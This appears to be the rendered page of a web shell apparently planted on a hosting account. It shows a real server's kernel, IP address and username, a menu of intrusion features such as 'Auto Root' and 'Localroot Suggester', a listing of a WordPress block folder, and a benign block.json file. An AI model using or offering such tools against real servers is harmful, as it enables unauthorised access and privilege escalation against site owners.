Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.217.64
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
georgeto /
wp-includes /
blocks /
tag-cloud /
Delete
Unzip
Name
Size
Permission
Date
Action
block.json
1.41
KB
-rw-r--r--
2024-09-20 18:25
editor-rtl.css
107
B
-rw-r--r--
2025-04-16 13:15
editor-rtl.min.css
93
B
-rw-r--r--
2025-04-16 13:15
editor.css
107
B
-rw-r--r--
2025-04-16 13:15
editor.min.css
93
B
-rw-r--r--
2025-04-16 13:15
style-rtl.css
571
B
-rw-r--r--
2025-12-03 17:22
style-rtl.min.css
502
B
-rw-r--r--
2025-12-03 17:22
style.css
572
B
-rw-r--r--
2025-12-03 17:22
style.min.css
503
B
-rw-r--r--
2025-12-03 17:22
Save
Rename
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/tag-cloud", "title": "Tag Cloud", "category": "widgets", "description": "A cloud of popular keywords, each sized by how often it appears.", "textdomain": "default", "attributes": { "numberOfTags": { "type": "number", "default": 45, "minimum": 1, "maximum": 100 }, "taxonomy": { "type": "string", "default": "post_tag" }, "showTagCounts": { "type": "boolean", "default": false }, "smallestFontSize": { "type": "string", "default": "8pt" }, "largestFontSize": { "type": "string", "default": "22pt" } }, "styles": [ { "name": "default", "label": "Default", "isDefault": true }, { "name": "outline", "label": "Outline" } ], "supports": { "html": false, "align": true, "spacing": { "margin": true, "padding": true }, "typography": { "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalLetterSpacing": true }, "interactivity": { "clientNavigation": true }, "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true, "__experimentalDefaultControls": { "radius": true, "color": true, "width": true, "style": true } } }, "editorStyle": "wp-block-tag-cloud-editor" }